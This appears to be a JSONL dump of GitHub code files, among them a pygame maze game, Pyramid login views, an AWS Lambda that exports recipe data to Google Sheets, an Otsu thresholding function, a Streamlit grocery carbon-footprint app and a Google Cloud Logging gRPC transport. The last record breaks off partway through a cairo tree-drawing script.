self.rect = self.image.get_rect()\r\n self.rect.x = player_x\r\n self.rect.y = player_y\r\n def reset(self):\r\n window.blit(self.image, (self.rect.x, self.rect.y))\r\nclass Player(GameSprite):\r\n def update(self):\r\n keys = key.get_pressed()\r\n if keys[K_a] and self.rect.x > 5:\r\n self.rect.x -= self.speed\r\n if keys[K_d] and self.rect.x < win_width - 65:\r\n self.rect.x += self.speed\r\n if keys[K_w] and self.rect.y > 5:\r\n self.rect.y -= self.speed\r\n if keys[K_s] and self.rect.y < win_height - 65:\r\n self.rect.y += self.speed\r\nclass Enemy(GameSprite):\r\n def __init__(self, player_image, player_x, player_y, player_speed, lg, rg):\r\n super().__init__(player_image, player_x, player_y, player_speed)\r\n self.direction = 'right'\r\n self.lg = lg\r\n self.rg = rg\r\n def update(self):\r\n self.rect.x +=1\r\n x1 = 500\r\n x2 = 635\r\n if self.rect.x <= self.lg:\r\n self.direction = \"right\"\r\n if self.rect.x >= self.rg: \r\n self.direction = 'left'\r\n if self.direction == 'left':\r\n self.rect.x -= 4\r\n if self.direction == 'right':\r\n self.rect.x += 2 \r\nclass Wall(sprite.Sprite):\r\n def __init__(self, color_1, color_2, color_3, wall_x, wall_y, wall_width, wall_height):\r\n super().__init__()\r\n self.color_1 = color_1\r\n self.color_2 = color_2\r\n self.color_3 = color_3\r\n self.width= wall_width\r\n self.height = wall_height\r\n self.image = Surface((self.width, self.height))\r\n self.image.fill((color_1, color_2, color_3))\r\n self.rect = self.image.get_rect()\r\n self.rect.x = wall_x\r\n self.rect.y = wall_y\r\n def draw_wall(self):\r\n window.blit(self.image, (self.rect.x, self.rect.y))\r\n\r\n\r\nclock = time.Clock()\r\nFPS = 60\r\nwindow = display.set_mode((win_width, win_height))\r\ndisplay.set_caption(\"Maze\")\r\ntreasure = GameSprite(\"treasure.png\", 635, 435, 0)\r\nplayer = Player(\"hero.png\", 0, 0, 5)\r\nkakashka_zlaya = Enemy(\"cyborg.png\", 500, 320, 3, 460, 635)\r\nkaka_zlaya_iz_raya = Enemy(\"cyborg.png\", 240, 10, 0, 240, 635)\r\nkaka = Enemy('cyborg.png', 625, 120, 0, 460, 625)\r\nwall_1 = Wall(115, 252, 3, 100, 0, 10, 400)\r\nwall_2 = Wall(115, 252, 3, 230, 0, 10, 80)\r\nwall_3 = Wall(115, 252, 3, 200, 80, 100, 10)\r\nwall_4 = Wall(115, 252, 3, 230, 200, 10, 520)\r\nwall_5 = Wall(115, 252, 3, 200, 200, 250, 10)\r\nwall_6 = Wall(115, 252, 3, 440, 90, 10, 110)\r\nwall_7 = Wall(115, 252, 3, 440, 90, 150, 10)\r\nwall_8 = Wall(115, 252, 3, 590, 90, 10, 500)\r\nwall_9 = Wall(115, 252, 3, 100, 400, 50, 10)\r\nmixer.init()\r\nfont.init()\r\nfont = font.SysFont(\"Arial\", 36)\r\nwinfont = font.render('YOU WIN!', True, (255, 215, 0)) # выигрыш \r\nlose = font.render(\"YOU LOSE\", True, (255, 0, 0))\r\nmixer.music.load('jungles.ogg')\r\nmixer.music.play()\r\nkick = mixer.Sound('kick.ogg')\r\nwin = mixer.Sound('money.ogg')\r\nbackground = transform.scale(image.load(\"background.jpg\"), (700, 500))\r\nwhile game:\r\n for e in event.get():\r\n if e.type == QUIT:\r\n game = False\r\n\r\n if not finish:\r\n window.blit(background, (0, 0))\r\n treasure.reset()\r\n player.reset()\r\n player.update()\r\n kakashka_zlaya.reset()\r\n kakashka_zlaya.update()\r\n kaka_zlaya_iz_raya.reset()\r\n kaka_zlaya_iz_raya.update()\r\n kaka.reset()\r\n kaka.update()\r\n wall_1.draw_wall()\r\n wall_2.draw_wall()\r\n wall_3.draw_wall()\r\n wall_4.draw_wall()\r\n wall_5.draw_wall()\r\n wall_6.draw_wall()\r\n wall_7.draw_wall()\r\n wall_8.draw_wall()\r\n wall_9.draw_wall()\r\n if sprite.collide_rect(player, kaka_zlaya_iz_raya) or sprite.collide_rect(player, kakashka_zlaya) or sprite.collide_rect(player, wall_1) or sprite.collide_rect(player, wall_2) or sprite.collide_rect(player, wall_3) or sprite.collide_rect(player, wall_4) or sprite.collide_rect(player, wall_5) or sprite.collide_rect(player, wall_6) or sprite.collide_rect(player, wall_7) or sprite.collide_rect(player, wall_8) or sprite.collide_rect(player, wall_9) or sprite.collide_rect(player, kaka):\r\n #game = False\r\n kick.play()\r\n window.blit(lose, (250, 250))\r\n finish = True\r\n if sprite.collide_rect(player, treasure):\r\n win.play\r\n window.blit(winfont, (250, 250))\r\n finish = True\r\n\r\n\r\n\r\n\r\n clock.tick(FPS)\r\n display.update()","repo_name":"YarRumS/Maze","sub_path":"maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40629982351","text":"import logging\n\nlog = logging.getLogger( __name__ )\n\nfrom pyramid.response import Response\nfrom pyramid.renderers import render_to_response\nfrom pyramid.security import remember, forget\nfrom pyramid.httpexceptions import HTTPFound, HTTPNotFound\n\nfrom rhombus.views import roles\nfrom rhombus.lib.roles import SYSADM, SYSVIEW\nfrom rhombus.models.user import UserClass, UserInstance\nfrom rhombus.lib.utils import get_dbhandler, random_string\n\nfrom urllib.parse import urlparse\nimport time\n\n\ndef index(request):\n return render_to_response( \"rhombus:templates/home.mako\", {}, request=request )\n\n\n@roles( SYSADM, SYSVIEW )\ndef panel(request):\n return render_to_response(\"rhombus:templates/panel.mako\", {}, request=request )\n\n\ndef login(request):\n \"\"\" login boilerplate\n fields:\n login\n password\n domain\n came_from\n \"\"\"\n\n dbh = get_dbhandler()\n\n msg = None\n referrer = request.referrer\n\n # set came_from\n came_from = request.params.get('came_from', referrer) or '/'\n userclass_name = request.params.get('userclass', None)\n if came_from == '/login':\n came_from = '/'\n\n # override with came_from in session\n came_from_session = request.session.get('came_from', None)\n if came_from_session:\n came_from = came_from_session\n else:\n request.session['came_from'] = came_from\n\n login = request.params.get('login', '')\n if '/' in login:\n login, userclass_name = login.split('/')\n elif '@' in login:\n # find based on email\n users = dbh.get_user_by_email(login)\n if len(users) > 1:\n # email is used by more than 1 users\n msg = 'Email address is used by multiple users!'\n elif len(users) == 1:\n user = users[0]\n login, userclass_name = user.login, user.userclass.domain\n else:\n msg = 'Email address does not match with any users'\n elif userclass_name is None:\n userclass_name = request.registry.settings.get('rhombus.default.userclass','_SYSTEM_')\n\n if request.POST and msg is None:\n\n passwd = request.params.get('password', '')\n userclass_id = int(request.params.get('domain', 1))\n\n userclass = dbh.get_userclass( userclass_name )\n\n if userclass:\n\n userinstance = userclass.auth_user( login, passwd )\n\n if userinstance is not None:\n headers = set_user_headers(userinstance, request)\n if came_from:\n o1 = urlparse(came_from)\n o2 = urlparse(request.host_url)\n if o1.netloc.lower() == o2.netloc.lower():\n request.session.flash(\n ('success', 'Welcome %s!' % userinstance.login)\n )\n del request.session['came_from']\n return HTTPFound( location = came_from,\n headers = headers )\n\n msg = 'Invalid username or password!'\n\n else:\n msg = 'Invalid userclass'\n\n return render_to_response(\"rhombus:templates/login.mako\",\n { 'msg': msg, 'came_from': came_from,\n 'login': '%s' % (login) },\n request = request)\n\n\ndef logout(request):\n request.del_user()\n headers = forget(request)\n if request.registry.settings.get('rhombus.authmode', None) == 'master':\n redirect = request.params.get('redirect', None)\n if not redirect:\n redirect = request.referrer or '/'\n return HTTPFound( location = redirect, headers = headers )\n redirect = request.referrer or '/'\n return HTTPFound( location=redirect,\n headers = headers )\n\n\ndef confirm(request):\n \"\"\" return (status, userinfo) tuple with status as boolen for confirmed (True)\n or unconfirmed (False), and userinfo is a list with the following content:\n [ lastname, firstname, email, institution,\n { group: role, group: role} # groups where user is member,\n [ group, group, ...] # groups where user is not member\n ]\n \"\"\"\n\n token = request.params.get('principal', '')\n print('confirmation request for:', token)\n userinfo = request.params.get('userinfo', 0)\n if not token:\n return [False, []]\n\n key = token.encode('ASCII')\n userinstance = request.auth_cache.get(key, None)\n\n if not userinstance:\n return [False, []]\n\n if userinfo:\n dbh = get_dbhandler()\n user = dbh.get_user( userinstance.id )\n # prepare for group sync\n\n usergroups = {}\n for ug in user.usergroups:\n usergroups[ug.group.name] = ug.role\n syncgroups = sorted(\n [grp_name for grp_name in [g.name for g in dbh.get_groups()]\n if grp_name.startswith('sync:')]\n )\n group_ins = {}\n group_out = []\n print(usergroups, syncgroups)\n for sg in syncgroups:\n if sg in usergroups:\n group_ins[sg[5:]] = usergroups[sg]\n else:\n group_out.append( sg[5:])\n\n userinfo = [ user.lastname, user.firstname, user.email, user.institution,\n group_ins, group_out ]\n else:\n userinfo = []\n\n return [True, userinfo]\n\n\ndef rhombus_css(request):\n \"\"\" this will update session, preventing time-out \"\"\"\n\n user = request.user\n if user:\n # unauthenticated_userid == autheticated_userid\n key = request.unauthenticated_userid.decode('ASCII')\n # refresh cache expiration\n request.auth_cache.set(key, user)\n\n return \"\"\n\n\ndef rhombus_js(request):\n\n return rhombus_css(request)\n\n\ndef set_user_headers(userinstance, request):\n \"\"\" create token, set user and return http header \"\"\"\n\n assert isinstance(userinstance, UserInstance)\n token = '|'.join(\n [userinstance.login, userinstance.domain, str(time.time()), random_string(128)]\n )\n request.set_user(token, userinstance)\n return remember(request, token)\n","repo_name":"trmznt/rhombus","sub_path":"rhombus/views/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":6077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9958120984","text":"from reader import read_for_qna, read_for_luis\n\n\n\ndef qna(file_name, dispatcher):\n\tqna = read_for_qna(file_name, dispatcher)\n\tfor q in qna:\n\t\tprint(q)\n\t\tq.update()\n\n\treturn qna\n\ndef luis(file_name):\n\tluis = read_for_luis(file_name)\n\tfor l in luis:\n\t\tprint(l)\n\t\tl.update()\n\n\treturn luis\n\ndef main():\n\tfile_name = input('File name: ')\n\tdispatch_model = input('Dispatch model: ')\n\n\tqna_tasks = qna(file_name, dispatch_model)\n\tluis_tasks = luis(file_name)\n\n\tif len(qna_tasks) > 0:\n\t\tqna_tasks[0].publish()\n\n\tif len(luis_tasks) > 0:\n\t\tluis_tasks[0].publish()\n\nif __name__ == '__main__':\n\tmain()","repo_name":"dominicpocaan/azure-authoring-client","sub_path":"authoring_client.py","file_name":"authoring_client.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"3827185876","text":"# Reference : https://www.shedloadofcode.com/blog/creating-your-own-website-analytics-solution-with-aws-lambda-and-google-sheets\n# Reference : https://boto3.amazonaws.com/v1/documentation/api/latest/guide/dynamodb.html\nimport json\nimport gspread\nimport boto3\nfrom boto3.dynamodb.conditions import Attr\ngc = gspread.service_account(filename='credentials.json')\ngsheet = gc.open(\"Recipe Analytics\")\nsheet1 = gsheet.sheet1\n\ndef lambda_handler(event, context):\n print(event)\n print(event['body'])\n dynamoDb = boto3.resource('dynamodb')\n table = dynamoDb.Table('recipes')\n comprehend = boto3.client(\"comprehend\")\n email = json.loads(event['body'])['email'];\n print(email)\n response = table.scan();\n print(response)\n \n items = response['Items']\n print(items)\n if response['Count'] == 0: #if response count is zero return with a message \n return{\n 'statusCode': 200,\n 'body': json.dumps('No recipe exists')\n }\n else:\n sheet1.delete_rows(2, 42) #Deleting already filled details every time the lambda is triggered\n my_list = []\n for item in items:\n l = item[\"email\"]\n if(email == l):\n recipeName = item[\"recipeName\"]\n recipeMap = {'recipe_name' : recipeName, 'day' : item['day'], 'month' : item['month'], 'year': item['year'] }\n my_list.append(recipeMap)\n else:\n continue\n print(my_list) \n write_events_to_google_sheet(my_list)\n return { \n \"statusCode\": 200,\n \"body\": json.dumps(\"Recipe saved in google sheets\"),\n } \n \n\ndef write_events_to_google_sheet(my_list):\n for recipes in my_list:\n recipeName = recipes['recipe_name'];\n print(recipeName)\n day = recipes['day'];\n print(day)\n month = recipes['month'];\n print(month)\n year = recipes['year'];\n print(year)\n row = [recipeName, day, month, year ]\n print(row)\n sheet1.insert_row(row, index = 2)\n \n \n \n \n \n \n \n ","repo_name":"Saifali786/Halifax-Foodie","sub_path":"Lambda Function/recipeVisualization/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33233803290","text":"import numpy as np\r\nfrom PIL import Image\r\nimport sys.float_info.epsilon as eps\r\n\r\ndef Otsu(Thresholds,image):\r\n \"\"\"Given a list of Thresholds and an image location , returns the fitness using Otsu's Objective function\"\"\"\r\n Thresholds.append(256)\r\n Thresholds.insert(0, 0)\r\n Thresholds.sort()\r\n img = Image.open(image).convert(\"L\")\r\n img=np.asarray(img)\r\n\r\n hist = [0] * 256 \r\n for i in range(len(img)):\r\n for j in range(len(img[0])):\r\n hist[int(img[i][j])] += 1\r\n\r\n Total_Pixels = len(img)*len(img[0])\r\n\r\n for i in range(len(hist)): # Probabilities\r\n hist[i] = hist[i] / Total_Pixels\r\n\r\n cumulative_sum = [] # declaractions\r\n cumulative_mean = []\r\n global_mean = 0\r\n Sigma = 0\r\n\r\n for i in range(len(Thresholds)-1):\r\n cumulative_sum.append(sum(hist[Thresholds[i]:Thresholds[i + 1]])+eps) # Cumulative sum of each Class\r\n\r\n cumulative = 0\r\n for j in range(Thresholds[i], Thresholds[i + 1]):\r\n cumulative = cumulative + (j + 1) * hist[j]\r\n \r\n cumulative_mean.append(cumulative / cumulative_sum[-1]) # Cumulative mean of each Class\r\n\r\n global_mean = global_mean + cumulative # Global Intensity Mean\r\n\r\n for i in range(len(cumulative_mean)): # Computing Sigma\r\n Sigma = Sigma + (cumulative_sum[i] *\r\n ((cumulative_mean[i] - global_mean) ** 2))\r\n\r\n return(Sigma)\r\n","repo_name":"iam-v0id/Otsu-MultiLevel-Thresholding","sub_path":"Otsu.py","file_name":"Otsu.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"70305165342","text":"import streamlit as st\r\nimport datetime\r\nimport torch\r\nimport os\r\nimport time\r\nimport geocoder\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nfrom PIL import Image\r\nfrom geopy.geocoders import Nominatim\r\nfrom pprint import pprint\r\n\r\n\r\n# variables for emissions calculator\r\napple_kg = 0.15\r\napple_co2 = 0.3\r\nbanana_kg = 0.12\r\nbanana_co2 = 0.8\r\ncitrus_kg = 0.14\r\ncitrus_co2 = 0.3\r\ncarrot_kg = 0.02\r\ncarrot_co2 = 0.3\r\nbroccoli_kg = 0.4\r\nbroccoli_co2 = 0.4\r\nco2_total = 0\r\norange_count = 0\r\napple_count = 0\r\ncarrot_count = 0\r\nbanana_count = 0\r\nbroc_count = 0\r\n\r\n# model params\r\nmodel = torch.hub.load('ultralytics/yolov5', 'yolov5s')\r\nmodel.conf = 0.25 # NMS confidence threshold\r\nmodel.max_det = 100 # maximum number of detections per image\r\n\r\n#~~~~~~~~~~~~~~~~~ auto city detection~~~~~~~~~~~~~~~~~~~~~#\r\ng = geocoder.ip('me')\r\napp = Nominatim(user_agent=\"tutorial\")\r\ndef get_address_by_location(latitude, longitude, language=\"en\"):\r\n \"\"\"This function returns an address as raw from a location\r\n will repeat until success\"\"\"\r\n # build coordinates string to pass to reverse() function\r\n coordinates = f\"{latitude}, {longitude}\"\r\n # sleep for a second to respect Usage Policy\r\n time.sleep(1)\r\n try:\r\n return app.reverse(coordinates, language=language).raw\r\n except:\r\n return get_address_by_location(latitude, longitude)\r\n# detect city from coordinates\r\nlatitude = g.latlng[0]\r\nlongitude = g.latlng[1]\r\naddress = get_address_by_location(latitude, longitude)\r\ncurrent_city = address['address']['city']\r\n\r\n#~~~~~~~~~~~~~~~~~ GUI ~~~~~~~~~~~~~~~~~~~~~#\r\n# Main page\r\nst.title(\"Welcome to FoodPrint!:apple::shopping_trolley::earth_americas:\")\r\nst.subheader(\"This application calculates the total carbon footprint of the food in your grocery cart and compares it to other real world carbon emissions. Keep track of your carbon footprint with Foodprint!\")\r\n\r\n# Sidebar\r\nimage = Image.open(r\"./gui_images/logo.png\")\r\nst.sidebar.image(image, caption = None, width = 210, use_column_width = 210)\r\nname = st.sidebar.text_input(\"What is your name?\")\r\nif name:\r\n output_name = st.sidebar.write(\"Hi \" + str(name) + \", welcome to FoodPrint! We will help you calculate the carbon footprint of your food.\")\r\n\r\n# Output current time and location\r\ntoday = datetime.date.today()\r\nst.sidebar.markdown('**Time and Location:**')\r\nst.sidebar.write(current_city)\r\nst.sidebar.markdown('**Current Date:**')\r\nst.sidebar.write(str(today))\r\n\r\n# ML Stuff\r\nhave_image = False\r\nuploaded_image = st.sidebar.file_uploader(\"Upload an image of your grocery cart below:\", type = [\"png\", \"jpg\", \"jpeg\"])\r\nif uploaded_image is not None:\r\n food_image = Image.open(uploaded_image)\r\n filename = uploaded_image.name\r\n have_image = True\r\n\r\n# Run model, compute emissions, display on GUI\r\nif ((have_image==True) & (st.sidebar.button(\"What's the carbon footprint of my shopping cart?\"))):\r\n \r\n results = model(food_image)\r\n # progress bar that does absolutely nothing but look cool\r\n my_bar = st.progress(0)\r\n for percent_complete in range(100):\r\n time.sleep(0.001)\r\n my_bar.progress(percent_complete + 1)\r\n st.success('Thanks for doing your part!', icon=\"✅\")\r\n\r\n # split into two tabular sections\r\n tab1, tab2 = st.tabs([\"Results\", \"Tips\"])\r\n with tab1:\r\n # save and display image\r\n results.save()\r\n image_path = 'runs/detect/exp/image0.jpg'\r\n print(image_path)\r\n result_image = Image.open(image_path)\r\n col1, col2 = st.columns(2)\r\n with col1:\r\n # type and number of foods\r\n table = results.pandas().xyxy[0]\r\n results_list = table.name.values.tolist()\r\n print(results_list)\r\n\r\n # emissions calculator stuff\r\n # dictionary that will have the amount of each item\r\n # the stuff in semicolons are emojis :)\r\n detected = {':apple:Apples': 0, ':banana:Bananas': 0, ':tangerine:Oranges': 0, ':carrot:Carrots': 0, ':broccoli:Broccoli': 0}\r\n\r\n # counting each item from the results list that yolo spits out\r\n for x in results_list:\r\n if x == \"orange\":\r\n orange_count += 1\r\n detected[':tangerine:Oranges'] = orange_count\r\n elif x == \"apple\":\r\n apple_count += 1\r\n detected[':apple:Apples'] = apple_count\r\n elif x == \"carrot\":\r\n carrot_count += 1\r\n detected[':carrot:Carrots'] = carrot_count\r\n elif x == \"banana\":\r\n banana_count += 1\r\n detected[':banana:Bananas'] = banana_count\r\n elif x == \"broccoli\":\r\n broc_count += 1\r\n detected[':broccoli:Broccoli'] = broc_count\r\n print(detected)\r\n\r\n # if item is detected and has nonzero items in the image, do math\r\n # total per item = quantity*item avg weight (kgItem)*co2 emissions per item(kgCo2/kgItem)\r\n if detected[':apple:Apples'] != 0:\r\n apple_em = detected[':apple:Apples'] * apple_kg * apple_co2\r\n co2_total += apple_em\r\n elif detected[':banana:Bananas'] != 0:\r\n banana_em = detected[':banana:Bananas'] * banana_kg * banana_co2\r\n co2_total += banana_em\r\n elif detected[':tangerine:Oranges'] != 0:\r\n orange_em = detected[':tangerine:Oranges'] * citrus_kg * citrus_co2\r\n co2_total += orange_em\r\n elif detected[':carrot:Carrots'] != 0:\r\n carrot_em = detected[':carrot:Carrots'] * carrot_kg * carrot_co2\r\n co2_total += carrot_em\r\n elif detected[':broccoli:Broccoli'] != 0:\r\n broccoli_em = detected[':broccoli:Broccoli'] * broccoli_kg * broccoli_co2\r\n co2_total += broccoli_em\r\n\r\n # display emissions as a metric because it looks cool\r\n # the delta is just a dummy rn, can be made to indicate something\r\n st.metric(label=\"kg Co2 Emissions\", value=co2_total, delta=\"GOOD\")\r\n # compare your emissions to something in the real world! Aka driving a car 1 mile = 0.034 kg of carbon emissions\r\n drive = round((co2_total/0.034), 2)\r\n st.write(\"This is equal to driving :car: \", str(drive), \"miles\")\r\n \r\n st.write(\"We detected: \")\r\n # displays nonzero keys, thus displays items detected\r\n for i in detected:\r\n if detected[i] != 0:\r\n st.write(i, detected[i])\r\n with col2:\r\n # displays image with bounding boxes from yolo\r\n st.image(result_image)\r\n os.unlink(image_path)\r\n os.rmdir('runs/detect/exp')\r\n\r\n with tab2:\r\n # info about reducing your emissions\r\n # this can also include the seasons table, this stuff is just kinda placeholder for now\r\n st.header(\"Tips to Reduce Your Food's Carbon Emissions\")\r\n st.subheader(\"- Eat produce that is in season\")\r\n st.subheader(\"- Buy Local\")\r\n st.subheader('- Decrease your red meat intake')\r\n st.markdown('[Learn More](https://ourworldindata.org/food-choice-vs-eating-local \"Learn More\")',\r\n unsafe_allow_html=False)\r\n\r\nmonth_gen= today.strftime(\"%B\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"astutt/foodprint","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7401,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"7234455637","text":"# https://www.checkio.org/mission/letter-queue/\n__author__ = 'Vitalii K'\n\nfrom collections import deque\n\n\ndef letter_queue(commands):\n fifo = deque([])\n for command in commands:\n if 'PUSH' in command:\n fifo.append(command.split(' ')[1])\n elif fifo:\n fifo.popleft()\n return ''.join(fifo)\n\n\nif __name__ == '__main__':\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert letter_queue([\"PUSH A\", \"POP\", \"POP\", \"PUSH Z\", \"PUSH D\", \"PUSH O\", \"POP\", \"PUSH T\"]) == \"DOT\", \"dot example\"\n assert letter_queue([\"POP\", \"POP\"]) == \"\", \"Pop, Pop, empty\"\n assert letter_queue([\"PUSH H\", \"PUSH I\"]) == \"HI\", \"Hi!\"\n assert letter_queue([]) == \"\", \"Nothing\"","repo_name":"tivaliy/checkio","sub_path":"letter_queue.py","file_name":"letter_queue.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"27787758319","text":"import google.api_core.grpc_helpers\n\nfrom googlecloudsdk.third_party.logging_v2.proto import logging_pb2_grpc\n\n\nclass LoggingServiceV2GrpcTransport(object):\n \"\"\"gRPC transport class providing stubs for\n google.logging.v2 LoggingServiceV2 API.\n\n The transport provides access to the raw gRPC stubs,\n which can be used to take advantage of advanced\n features of gRPC.\n \"\"\"\n # The scopes needed to make gRPC calls to all of the methods defined\n # in this service.\n _OAUTH_SCOPES = (\n 'https://www.googleapis.com/auth/cloud-platform',\n 'https://www.googleapis.com/auth/cloud-platform.read-only',\n 'https://www.googleapis.com/auth/logging.admin',\n 'https://www.googleapis.com/auth/logging.read',\n 'https://www.googleapis.com/auth/logging.write',\n )\n\n def __init__(self, channel=None, credentials=None,\n address='logging.googleapis.com:443'):\n \"\"\"Instantiate the transport class.\n\n Args:\n channel (grpc.Channel): A ``Channel`` instance through\n which to make calls. This argument is mutually exclusive\n with ``credentials``; providing both will raise an exception.\n credentials (google.auth.credentials.Credentials): The\n authorization credentials to attach to requests. These\n credentials identify this application to the service. If none\n are specified, the client will attempt to ascertain the\n credentials from the environment.\n address (str): The address where the service is hosted.\n \"\"\"\n # If both `channel` and `credentials` are specified, raise an\n # exception (channels come with credentials baked in already).\n if channel is not None and credentials is not None:\n raise ValueError(\n 'The `channel` and `credentials` arguments are mutually '\n 'exclusive.',\n )\n\n # Create the channel.\n if channel is None:\n channel = self.create_channel(\n address=address,\n credentials=credentials,\n options={\n 'grpc.max_send_message_length': -1,\n 'grpc.max_receive_message_length': -1,\n }.items(),\n )\n\n self._channel = channel\n\n # gRPC uses objects called \"stubs\" that are bound to the\n # channel and provide a basic method for each RPC.\n self._stubs = {\n 'logging_service_v2_stub': logging_pb2_grpc.LoggingServiceV2Stub(channel),\n }\n\n\n @classmethod\n def create_channel(\n cls,\n address='logging.googleapis.com:443',\n credentials=None,\n **kwargs):\n \"\"\"Create and return a gRPC channel object.\n\n Args:\n address (str): The host for the channel to use.\n credentials (~.Credentials): The\n authorization credentials to attach to requests. These\n credentials identify this application to the service. If\n none are specified, the client will attempt to ascertain\n the credentials from the environment.\n kwargs (dict): Keyword arguments, which are passed to the\n channel creation.\n\n Returns:\n grpc.Channel: A gRPC channel object.\n \"\"\"\n return google.api_core.grpc_helpers.create_channel(\n address,\n credentials=credentials,\n scopes=cls._OAUTH_SCOPES,\n **kwargs\n )\n\n @property\n def channel(self):\n \"\"\"The gRPC channel used by the transport.\n\n Returns:\n grpc.Channel: A gRPC channel object.\n \"\"\"\n return self._channel\n\n @property\n def delete_log(self):\n \"\"\"Return the gRPC stub for :meth:`LoggingServiceV2Client.delete_log`.\n\n Deletes all the log entries in a log. The log reappears if it receives new\n entries. Log entries written shortly before the delete operation might not\n be deleted. Entries received after the delete operation with a timestamp\n before the operation will be deleted.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['logging_service_v2_stub'].DeleteLog\n\n @property\n def list_log_entries(self):\n \"\"\"Return the gRPC stub for :meth:`LoggingServiceV2Client.list_log_entries`.\n\n Lists log entries. Use this method to retrieve log entries that\n originated from a project/folder/organization/billing account. For ways\n to export log entries, see `Exporting\n Logs `__.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['logging_service_v2_stub'].ListLogEntries\n\n @property\n def write_log_entries(self):\n \"\"\"Return the gRPC stub for :meth:`LoggingServiceV2Client.write_log_entries`.\n\n Writes log entries to Logging. This API method is the\n only way to send log entries to Logging. This method\n is used, directly or indirectly, by the Logging agent\n (fluentd) and all logging libraries configured to use Logging.\n A single request may contain log entries for a maximum of 1000\n different resources (projects, organizations, billing accounts or\n folders)\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['logging_service_v2_stub'].WriteLogEntries\n\n @property\n def list_monitored_resource_descriptors(self):\n \"\"\"Return the gRPC stub for :meth:`LoggingServiceV2Client.list_monitored_resource_descriptors`.\n\n Lists the descriptors for monitored resource types used by Logging.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['logging_service_v2_stub'].ListMonitoredResourceDescriptors\n\n @property\n def list_logs(self):\n \"\"\"Return the gRPC stub for :meth:`LoggingServiceV2Client.list_logs`.\n\n Lists the logs in projects, organizations, folders, or billing accounts.\n Only logs that have entries are listed.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['logging_service_v2_stub'].ListLogs\n\n @property\n def tail_log_entries(self):\n \"\"\"Return the gRPC stub for :meth:`LoggingServiceV2Client.tail_log_entries`.\n\n Streaming read of log entries as they are ingested. Until the stream is\n terminated, it will continue reading logs.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['logging_service_v2_stub'].TailLogEntries\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/third_party/logging_v2/gapic/transports/logging_service_v2_grpc_transport.py","file_name":"logging_service_v2_grpc_transport.py","file_ext":"py","file_size_in_byte":7516,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"18048441096","text":"#!/bin/env python\n\n# written while watching 2008 olympics\n\nimport cairo\nfrom string import split, strip\nfrom math import pi\nfrom sys import argv\n\nWIDTH, HEIGHT = 700, 960\n\nfontSize = 15\ncornerRadius = 6\nextraSpace = 5\ndeltaX = 5\ndeltaY = 5\nscale = 1\n\ndef numspaces(str):\n\tn = 0\n\tfor s in str:\n\t\tif s == ' ':\n\t\t\tn += 1\n\t\telse:\n\t\t\treturn n\n\ndef loaddata(fn):\n\tlines = open(fn).readlines()\n\tlastn = -1\n\tadd = {}\n\tfor l in lines:\n\t\tn = numspaces(l)\n\t\ts = split(strip(l))\n\t\tif len(s) == 0:\n\t\t\tcontinue\n\t\tdir = s[0]\n\t\tif len(s) < 2:\n\t\t\tinfo = ''\n\t\telse:\n\t\t\tinfo = strip(l[n+len(dir):])\n\t\tdata = [dir, info]\n\t\tif lastn == -1:\n\t\t\tadd[0] = data\n\t\telse:\n\t\t\tif n > lastn:\n\t\t\t\tadd[n] = last\n\t\t\tadd[n].append(data)\n\t\tlastn = n\n\t\tlast = data\n\t\t\t\n\treturn add[0]\n\ndef drawtree(ctx, x, y, data):\n\tif len(data) < 2:\n\t\treturn\n\tctx.move_to(x, y)\n\tctx.select_font_face(\"monospace\", 0, 1)\n\tctx.show_text(data[0]+' ')\n\tctx.select_font_face(\"serif\", 0, 0)\n\tcomments = split(data[1], \"\\\\\");\n\tdelta = 0\n\tx0, y0 = ctx.get_current_point()\n\tfor c in comments:\n\t\tctx.move_to(x0, y0)\n\t\tk = split(strip(c), '\"')\n\t\tl = len(k)\n\t\tfor i in range(l):\n\t\t\tif i%2 == 0:\n\t\t\t\tctx.select_font_face(\"serif\", 0, 0)\n\t\t\telse:\n\t\t\t\tctx.select_font_face(\"monospace\", 0, 0)\n\t\t\tctx.show_text(k[i])\n\t\tdelta += fontSize+2\n\t\ty0 = y + delta\n\tdelta += extraSpace\n\n\ty0 = y+deltaY\n\ty += delta\n\tdaughters = data[2:]\n\tn = len(daughters)\n\tfor i in range(n):\n\t\tv = daughters[i]\n\t\tctx.move_to(x+deltaX, y0)\n\t\ty0 = y-deltaY\n\t\tif i < n-1:\n\t\t\tctx.line_to(x+deltaX, y0)\n\t\t\tctx.line_to(x+3*deltaX, 